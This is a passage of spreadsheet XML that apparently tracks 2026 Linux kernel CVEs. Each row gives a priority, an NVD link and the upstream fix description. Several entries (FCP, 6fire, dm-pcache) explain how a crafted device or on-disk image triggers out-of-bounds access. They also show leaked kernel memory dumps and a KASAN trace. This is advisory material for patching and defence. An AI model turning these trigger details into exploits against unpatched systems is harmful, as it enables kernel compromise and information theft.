          <t>NVD</t>
        </is>
      </c>
      <c r="O943" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P943" s="5" t="inlineStr"/>
      <c r="Q943" s="5" t="inlineStr"/>
      <c r="R943" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
i3c: master: svc: bound IBI payload to the requested max_payload_len
svc_i3c_master_handle_ibi() reads the IBI payload from the RX FIFO into
the IBI slot. The loop is bounded by the hardware FIFO size
(SVC_I3C_FIFO_SIZE), not by the slot size.
slot-&gt;data points into the IBI pool, which i3c_generic_ibi_alloc_pool()
sizes at max_payload_len per slot. svc_i3c_master_request_ibi() only
rejects a max_payload_len larger than SVC_I3C_FIFO_SIZE, so a driver can
request a smaller one. mctp-i3c requests 1. Each readsb() then copies the
controller RXCOUNT bytes (up to 31) with no check against the slot size.
A device that sends more bytes than the slot holds writes past
slot-&gt;data, an out-of-bounds write into the IBI pool.
Bound the loop by dev-&gt;ibi-&gt;max_payload_len and clamp each read to the
space left in the slot, the same way dw-i3c does. A device can still send
more than the requested payload. Flush the leftover bytes from the RX FIFO
so they do not leak into the next transfer.</t>
        </is>
      </c>
      <c r="S943" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80951</t>
        </is>
      </c>
    </row>
    <row r="944">
      <c r="A944" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B944" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C944" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80956</t>
        </is>
      </c>
      <c r="D944" s="5" t="inlineStr"/>
      <c r="E944" s="5" t="inlineStr"/>
      <c r="F944" s="5" t="inlineStr"/>
      <c r="G944" s="5" t="inlineStr"/>
      <c r="H944" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I944" s="5" t="inlineStr"/>
      <c r="J944" s="5" t="inlineStr"/>
      <c r="K944" s="5" t="inlineStr"/>
      <c r="L944" s="5" t="inlineStr"/>
      <c r="M944" s="5" t="inlineStr"/>
      <c r="N944" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O944" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P944" s="5" t="inlineStr"/>
      <c r="Q944" s="5" t="inlineStr"/>
      <c r="R944" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
dm-pcache: only hand out initialized cache segments
get_cache_segment() scans the segment map up to cache-&gt;n_segs, the
physical device segment count, but cache_segs_init() only initializes
the first cache_info-&gt;n_segs segments. A crafted image with
cache_info-&gt;n_segs smaller than the device count leaves the remaining
pcache_cache_segment structs zeroed (segment.data == NULL), and the
allocator can hand one to cache_kset_close(), which writes through the
returned segment's data pointer with no NULL check.
Bound the allocator's search to cache_info-&gt;n_segs so only initialized
segments are ever returned. A conforming cache sets n_segs equal to the
device segment count, so this rejects nothing legitimate.</t>
        </is>
      </c>
      <c r="S944" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80956</t>
        </is>
      </c>
    </row>
    <row r="945">
      <c r="A945" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B945" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C945" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80957</t>
        </is>
      </c>
      <c r="D945" s="5" t="inlineStr"/>
      <c r="E945" s="5" t="inlineStr"/>
      <c r="F945" s="5" t="inlineStr"/>
      <c r="G945" s="5" t="inlineStr"/>
      <c r="H945" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I945" s="5" t="inlineStr"/>
      <c r="J945" s="5" t="inlineStr"/>
      <c r="K945" s="5" t="inlineStr"/>
      <c r="L945" s="5" t="inlineStr"/>
      <c r="M945" s="5" t="inlineStr"/>
      <c r="N945" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O945" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P945" s="5" t="inlineStr"/>
      <c r="Q945" s="5" t="inlineStr"/>
      <c r="R945" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
dm-pcache: detect a cycle in the last-kset chain during replay
cache_replay() follows the on-media last-kset chain by next_cache_seg_id
with no cond_resched(). A forged chain that points back into a segment it
has already visited makes the replay loop follow it forever.
Cap the last-kset hops at cache-&gt;n_segs; a valid chain visits each segment
at most once.</t>
        </is>
      </c>
      <c r="S945" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80957</t>
        </is>
      </c>
    </row>
    <row r="946">
      <c r="A946" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B946" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C946" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80960</t>
        </is>
      </c>
      <c r="D946" s="5" t="inlineStr"/>
      <c r="E946" s="5" t="inlineStr"/>
      <c r="F946" s="5" t="inlineStr"/>
      <c r="G946" s="5" t="inlineStr"/>
      <c r="H946" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I946" s="5" t="inlineStr"/>
      <c r="J946" s="5" t="inlineStr"/>
      <c r="K946" s="5" t="inlineStr"/>
      <c r="L946" s="5" t="inlineStr"/>
      <c r="M946" s="5" t="inlineStr"/>
      <c r="N946" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O946" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P946" s="5" t="inlineStr"/>
      <c r="Q946" s="5" t="inlineStr"/>
      <c r="R946" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
dm-pcache: validate on-media seg_num against the cache device size
seg_num is read from the crc32c-only superblock, so whoever supplies the
cache device on a table load (CAP_SYS_ADMIN) controls it. It sizes
cache-&gt;segments[] and is the value every later on-media segment id is
bounded against, yet it is never checked against the device. Because
cache_dev-&gt;mapping is the direct map of the pmem, CACHE_DEV_SEGMENT() for
a segment id past the device resolves to ordinary kernel memory beyond
the mapping; a new-cache init reaching such an id has cache_seg_init() -&gt;
cache_dev_zero_range() memset() 12 KiB over that memory -- an
out-of-bounds write into the kernel heap at table load. A zero seg_num
makes the segment allocations ZERO_SIZE_PTR.
Reject a seg_num that is zero, larger than the device can hold, or larger
than PCACHE_CACHE_SEGS_MAX before it is used.</t>
        </is>
      </c>
      <c r="S946" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80960</t>
        </is>
      </c>
    </row>
    <row r="947">
      <c r="A947" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B947" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C947" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80963</t>
        </is>
      </c>
      <c r="D947" s="5" t="inlineStr"/>
      <c r="E947" s="5" t="inlineStr"/>
      <c r="F947" s="5" t="inlineStr"/>
      <c r="G947" s="5" t="inlineStr"/>
      <c r="H947" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I947" s="5" t="inlineStr"/>
      <c r="J947" s="5" t="inlineStr"/>
      <c r="K947" s="5" t="inlineStr"/>
      <c r="L947" s="5" t="inlineStr"/>
      <c r="M947" s="5" t="inlineStr"/>
      <c r="N947" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O947" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P947" s="5" t="inlineStr"/>
      <c r="Q947" s="5" t="inlineStr"/>
      <c r="R947" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
dm-stats: fix a crash if allocation of per-cpu data fails
If "dm_kvzalloc(percpu_alloc_size, cpu_to_node(cpu))" fails, the code
jumps to the "out" label and calls dm_stat_free. dm_stat_free does
"for_each_possible_cpu(cpu) { dm_kvfree(s-&gt;stat_percpu[cpu][0].histogram,
s-&gt;histogram_alloc_size);", which crashes with NULL pointer dereference
if s-&gt;stat_percpu[cpu] is NULL.
This commit fixes the bug by testing s-&gt;stat_percpu[cpu] for NULL before
using it.</t>
        </is>
      </c>
      <c r="S947" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80963</t>
        </is>
      </c>
    </row>
    <row r="948">
      <c r="A948" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B948" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C948" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80964</t>
        </is>
      </c>
      <c r="D948" s="5" t="inlineStr"/>
      <c r="E948" s="5" t="inlineStr"/>
      <c r="F948" s="5" t="inlineStr"/>
      <c r="G948" s="5" t="inlineStr"/>
      <c r="H948" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I948" s="5" t="inlineStr"/>
      <c r="J948" s="5" t="inlineStr"/>
      <c r="K948" s="5" t="inlineStr"/>
      <c r="L948" s="5" t="inlineStr"/>
      <c r="M948" s="5" t="inlineStr"/>
      <c r="N948" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O948" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P948" s="5" t="inlineStr"/>
      <c r="Q948" s="5" t="inlineStr"/>
      <c r="R948" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ALSA: virmidi: Check card index validity at probe
virmidi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S948" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80964</t>
        </is>
      </c>
    </row>
    <row r="949">
      <c r="A949" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B949" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C949" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80965</t>
        </is>
      </c>
      <c r="D949" s="5" t="inlineStr"/>
      <c r="E949" s="5" t="inlineStr"/>
      <c r="F949" s="5" t="inlineStr"/>
      <c r="G949" s="5" t="inlineStr"/>
      <c r="H949" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I949" s="5" t="inlineStr"/>
      <c r="J949" s="5" t="inlineStr"/>
      <c r="K949" s="5" t="inlineStr"/>
      <c r="L949" s="5" t="inlineStr"/>
      <c r="M949" s="5" t="inlineStr"/>
      <c r="N949" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O949" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P949" s="5" t="inlineStr"/>
      <c r="Q949" s="5" t="inlineStr"/>
      <c r="R949" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ALSA: serial-u16550: Check card index validity at probe
serial-u16550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S949" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80965</t>
        </is>
      </c>
    </row>
    <row r="950">
      <c r="A950" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B950" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C950" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80966</t>
        </is>
      </c>
      <c r="D950" s="5" t="inlineStr"/>
      <c r="E950" s="5" t="inlineStr"/>
      <c r="F950" s="5" t="inlineStr"/>
      <c r="G950" s="5" t="inlineStr"/>
      <c r="H950" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I950" s="5" t="inlineStr"/>
      <c r="J950" s="5" t="inlineStr"/>
      <c r="K950" s="5" t="inlineStr"/>
      <c r="L950" s="5" t="inlineStr"/>
      <c r="M950" s="5" t="inlineStr"/>
      <c r="N950" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O950" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P950" s="5" t="inlineStr"/>
      <c r="Q950" s="5" t="inlineStr"/>
      <c r="R950" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ALSA: portman2x4: Check card index validity at probe
Although portman2x4 driver has a check of the given devptr-&gt;id value,
it doesn't check for a negative id, which is often given as "none" or
such value when bound via sysfs.  This may lead to OOB access for
index[] and other parameters.
Add a sanity check for the card index and warn/correct it if it's a
value out of the range.</t>
        </is>
      </c>
      <c r="S950" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80966</t>
        </is>
      </c>
    </row>
    <row r="951">
      <c r="A951" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B951" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C951" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80968</t>
        </is>
      </c>
      <c r="D951" s="5" t="inlineStr"/>
      <c r="E951" s="5" t="inlineStr"/>
      <c r="F951" s="5" t="inlineStr"/>
      <c r="G951" s="5" t="inlineStr"/>
      <c r="H951" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I951" s="5" t="inlineStr"/>
      <c r="J951" s="5" t="inlineStr"/>
      <c r="K951" s="5" t="inlineStr"/>
      <c r="L951" s="5" t="inlineStr"/>
      <c r="M951" s="5" t="inlineStr"/>
      <c r="N951" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O951" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P951" s="5" t="inlineStr"/>
      <c r="Q951" s="5" t="inlineStr"/>
      <c r="R951" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ALSA: mts64: Check card index validity at probe
Although mts64 driver has a check of the given devptr-&gt;id value, it
doesn't check for a negative id, which is often given as "none" or
such value when bound via sysfs.  This may lead to OOB access for
index[] and other parameters.
Add a sanity check for the card index and warn/correct it if it's a
value out of the range.</t>
        </is>
      </c>
      <c r="S951" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80968</t>
        </is>
      </c>
    </row>
    <row r="952">
      <c r="A952" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B952" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C952" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80969</t>
        </is>
      </c>
      <c r="D952" s="5" t="inlineStr"/>
      <c r="E952" s="5" t="inlineStr"/>
      <c r="F952" s="5" t="inlineStr"/>
      <c r="G952" s="5" t="inlineStr"/>
      <c r="H952" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I952" s="5" t="inlineStr"/>
      <c r="J952" s="5" t="inlineStr"/>
      <c r="K952" s="5" t="inlineStr"/>
      <c r="L952" s="5" t="inlineStr"/>
      <c r="M952" s="5" t="inlineStr"/>
      <c r="N952" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O952" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P952" s="5" t="inlineStr"/>
      <c r="Q952" s="5" t="inlineStr"/>
      <c r="R952" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ALSA: mpu401: Check card index validity at probe
mpu401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S952" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80969</t>
        </is>
      </c>
    </row>
    <row r="953">
      <c r="A953" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B953" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C953" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80970</t>
        </is>
      </c>
      <c r="D953" s="5" t="inlineStr"/>
      <c r="E953" s="5" t="inlineStr"/>
      <c r="F953" s="5" t="inlineStr"/>
      <c r="G953" s="5" t="inlineStr"/>
      <c r="H953" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I953" s="5" t="inlineStr"/>
      <c r="J953" s="5" t="inlineStr"/>
      <c r="K953" s="5" t="inlineStr"/>
      <c r="L953" s="5" t="inlineStr"/>
      <c r="M953" s="5" t="inlineStr"/>
      <c r="N953" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O953" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P953" s="5" t="inlineStr"/>
      <c r="Q953" s="5" t="inlineStr"/>
      <c r="R953" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ALSA: FCP: do not copy out an uninitialised init response
fcp_ioctl_init() allocates its response buffer with kmalloc() and copies
the whole buffer back to userspace:
	buf_size = init.step0_resp_size + init.step2_resp_size;
	void *resp __free(kfree) =
		kmalloc(buf_size, GFP_KERNEL);
	...
	if (copy_to_user(arg-&gt;resp, resp, buf_size))
		return -EFAULT;
Nothing clears the buffer, and the only writer of its leading
step0_resp_size bytes is the step-0 control transfer:
	err = snd_usb_ctl_msg(dev, usb_rcvctrlpipe(dev, 0),
		FCP_USB_REQ_STEP0,
		USB_RECIP_INTERFACE | USB_TYPE_CLASS | USB_DIR_IN,
		0, private-&gt;bInterfaceNumber,
		step0_resp, private-&gt;step0_resp_size);
	if (err &lt; 0)
		return err;
usb_fill_control_urb() does not set URB_SHORT_NOT_OK, so a short or
zero-length data stage completes with status 0 and snd_usb_ctl_msg()
returns a small actual_length.  The only check is err &lt; 0, so a short
transfer is accepted as success.
snd_usb_ctl_msg() copies the full size back unconditionally:
	buf = kmemdup(data, size, GFP_KERNEL);
	...
	memcpy(data, buf, size);
Bytes the device never wrote are therefore restored into resp unchanged
and copied to userspace.  step0_resp_size and step2_resp_size are each
validated only to 1..255, so the caller also picks the slab cache, from
kmalloc-8 up to kmalloc-512.
On 7.2.0-rc5 (arm64), device answering step 0 with a zero-length data
stage, s0 = s2 = 255:
  # init_on_alloc off, no spray
  step0 window [0,255): nonzero=94/255
  000: 00 80 60 06 00 00 ff ff 18 00 00 00 57 01 ea 01
  010: 08 78 22 13 00 00 ff ff a8 c4 5f 80 00 80 ff ff
  # same kernel, kmalloc-512 pre-seeded with an 8-byte tag
  step0 window [0,255): nonzero=219/255  tagbytes=232
  # identical run, init_on_alloc=1
  step0 window [0,255): nonzero=0/255  tagbytes=0
  # all three runs
  step2 window [255,510): device words matched=62/62
a8 c4 5f 80 00 80 ff ff is the little-endian kernel text address
ffff8000805fc4a8.  The step-2 window is unaffected, so the disclosure is
exactly the step-0 region.
Zero the buffer, and require the step-0 transfer to deliver the full
step0_resp_size bytes so a short data stage is reported as an error.
Discovered by XBOW, triaged by Baul Lee &lt;baul.lee@xbow.com&gt;</t>
        </is>
      </c>
      <c r="S953" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80970</t>
        </is>
      </c>
    </row>
    <row r="954">
      <c r="A954" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B954" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C954" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80972</t>
        </is>
      </c>
      <c r="D954" s="5" t="inlineStr"/>
      <c r="E954" s="5" t="inlineStr"/>
      <c r="F954" s="5" t="inlineStr"/>
      <c r="G954" s="5" t="inlineStr"/>
      <c r="H954" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I954" s="5" t="inlineStr"/>
      <c r="J954" s="5" t="inlineStr"/>
      <c r="K954" s="5" t="inlineStr"/>
      <c r="L954" s="5" t="inlineStr"/>
      <c r="M954" s="5" t="inlineStr"/>
      <c r="N954" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O954" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P954" s="5" t="inlineStr"/>
      <c r="Q954" s="5" t="inlineStr"/>
      <c r="R954" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ALSA: aloop: Check card index validity at probe
aloop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S954" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80972</t>
        </is>
      </c>
    </row>
    <row r="955">
      <c r="A955" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B955" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C955" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80973</t>
        </is>
      </c>
      <c r="D955" s="5" t="inlineStr"/>
      <c r="E955" s="5" t="inlineStr"/>
      <c r="F955" s="5" t="inlineStr"/>
      <c r="G955" s="5" t="inlineStr"/>
      <c r="H955" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I955" s="5" t="inlineStr"/>
      <c r="J955" s="5" t="inlineStr"/>
      <c r="K955" s="5" t="inlineStr"/>
      <c r="L955" s="5" t="inlineStr"/>
      <c r="M955" s="5" t="inlineStr"/>
      <c r="N955" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O955" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P955" s="5" t="inlineStr"/>
      <c r="Q955" s="5" t="inlineStr"/>
      <c r="R955" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ALSA: 6fire: bound the MIDI event length from the device
usb6fire_comm_receiver_handler() forwards a MIDI event using a length
byte the device supplies, with no bound and no check that the transfer
delivered that many bytes:
	if (!urb-&gt;status) {
		if (rt-&gt;receiver_buffer[0] == 0x10) /* midi in event */
			if (midi_rt)
				midi_rt-&gt;in_received(midi_rt,
						rt-&gt;receiver_buffer + 2,
						rt-&gt;receiver_buffer[1]);
	}
receiver_buffer is a 64-byte kzalloc() buffer (COMM_RECEIVER_BUFSIZE), so
only 62 bytes follow the two-byte header.  receiver_buffer[1] is a u8 the
device chooses, so a device that answers with 0x10 and a length of 0xFF
makes snd_rawmidi_receive() read 255 bytes starting two bytes into a
64-byte object.  The bytes past the buffer are handed to userspace
through the rawmidi read path.
urb-&gt;actual_length is not consulted either, so a short transfer leaves
both the type byte and the length byte at their previous values and the
handler acts on stale data.
The receiver URB is submitted from usb6fire_comm_init() at probe, so the
read happens on plug with no user action; forwarding to userspace also
needs a MIDI input substream open, since usb6fire_midi_in_received()
only calls snd_rawmidi_receive() when rt-&gt;in is set.
KASAN on 7.2.0-rc5 (arm64), single packet from an emulated device:
  BUG: KASAN: slab-out-of-bounds in snd_rawmidi_receive
  Read of size 255 at addr ffff000009f64682 by task bash/183
   __asan_memcpy
   snd_rawmidi_receive
   usb6fire_midi_in_received [snd_usb_6fire]
   usb6fire_comm_receiver_handler [snd_usb_6fire]
  Allocated by task 11:
   usb6fire_comm_init [snd_usb_6fire]
   usb6fire_chip_probe [snd_usb_6fire]
  The buggy address is located 2 bytes inside of
   allocated 64-byte region [ffff000009f64680, ffff000009f646c0)
Reject the event when the length exceeds the bytes that follow the
header, and require the transfer to have delivered the header plus that
many bytes.  The receiver URB is submitted with a 64-byte
transfer_buffer_length, so a genuine device cannot deliver an event
longer than those 62 bytes and nothing valid is dropped.
Discovered by XBOW, triaged by Baul Lee &lt;baul.lee@xbow.com&gt;</t>
        </is>
      </c>
      <c r="S955" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80973</t>
        </is>
      </c>
    </row>
    <row r="956">
      <c r="A956" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B956" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C956" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80974</t>
        </is>
      </c>
      <c r="D956" s="5" t="inlineStr"/>
      <c r="E956" s="5" t="inlineStr"/>
      <c r="F956" s="5" t="inlineStr"/>
      <c r="G956" s="5" t="inlineStr"/>
      <c r="H956" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I956" s="5" t="inlineStr"/>
      <c r="J956" s="5" t="inlineStr"/>
      <c r="K956" s="5" t="inlineStr"/>
      <c r="L956" s="5" t="inlineStr"/>
      <c r="M956" s="5" t="inlineStr"/>
      <c r="N956" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O956" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P956" s="5" t="inlineStr"/>
      <c r="Q956" s="5" t="inlineStr"/>
      <c r="R956" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mfd: sm501: Fix potential memory leaks during remove
The memory allocated for struct sm501_devdata in sm501_pci_probe() and
sm501_plat_probe() is not freed by the corresponding remove functions
sm501_pci_remove() and sm501_plat_remove(). Fix that by adding a call to
kfree().</t>
        </is>
      </c>
      <c r="S956" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80974</t>
        </is>
      </c>
    </row>
    <row r="957">
      <c r="A957" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B957" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C957" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80983</t>
        </is>
      </c>
      <c r="D957" s="5" t="inlineStr"/>
      <c r="E957" s="5" t="inlineStr"/>
      <c r="F957" s="5" t="inlineStr"/>
      <c r="G957" s="5" t="inlineStr"/>
      <c r="H957" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I957" s="5" t="inlineStr"/>
      <c r="J957" s="5" t="inlineStr"/>
      <c r="K957" s="5" t="inlineStr"/>
      <c r="L957" s="5" t="inlineStr"/>
      <c r="M957" s="5" t="inlineStr"/>
      <c r="N957" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O957" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P957" s="5" t="inlineStr"/>
      <c r="Q957" s="5" t="inlineStr"/>
      <c r="R957" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/smc: fix socket refcount leak in smc_switch_conns()
smc_switch_conns() takes a reference on the SMC socket before dropping
lgr-&gt;conns_lock, so the connection stays alive while the CDC slot is
fetched:
        sock_hold(&amp;smc-&gt;sk);
        read_unlock_bh(&amp;lgr-&gt;conns_lock);
        /* pre-fetch buffer outside of send_lock, might sleep */
        rc = smc_cdc_get_free_slot(conn, to_lnk, &amp;wr_buf, NULL, &amp;pend);
        if (rc)
                goto err_out;
The err_out label only drops the wr_tx link reference, so this early exit
returns without the matching sock_put(). The second error exit is not
affected, because sock_put() has already run by then.
A leaked sk_refcnt means the smc_sock is never destroyed. Its send and
receive buffers stay allocated, and for a user socket the reference held
on the network namespace is never released, so the netns can no longer be
torn down.
smc_cdc_get_free_slot() fails when the target link goes down or when the
connection has been killed while the switch is in progress. Both are
reachable during the link failover this function implements, so the leak
is triggered by the same hardware events that make smc_switch_conns() run
in the first place.
Restructure so there is a single sock_put() covering both outcomes,
instead of adding a second one to the error path.</t>
        </is>
      </c>
      <c r="S957" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80983</t>
        </is>
      </c>
    </row>
    <row r="958">
      <c r="A958" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B958" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C958" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80984</t>
        </is>
      </c>
      <c r="D958" s="5" t="inlineStr"/>
      <c r="E958" s="5" t="inlineStr"/>
      <c r="F958" s="5" t="inlineStr"/>
      <c r="G958" s="5" t="inlineStr"/>
      <c r="H958" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I958" s="5" t="inlineStr"/>
      <c r="J958" s="5" t="inlineStr"/>
      <c r="K958" s="5" t="inlineStr"/>
      <c r="L958" s="5" t="inlineStr"/>
      <c r="M958" s="5" t="inlineStr"/>
      <c r="N958" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O958" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P958" s="5" t="inlineStr"/>
      <c r="Q958" s="5" t="inlineStr"/>
      <c r="R958" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/smc: do not dereference an unset send buffer on the SMC-D teardown path
smc_close_stream_wait() calls smc_tx_prepared_sends() from inside its
sk_wait_event() condition, and sk_wait_event() evaluates that condition
once with the socket lock released. smcd_buf_detach() clears
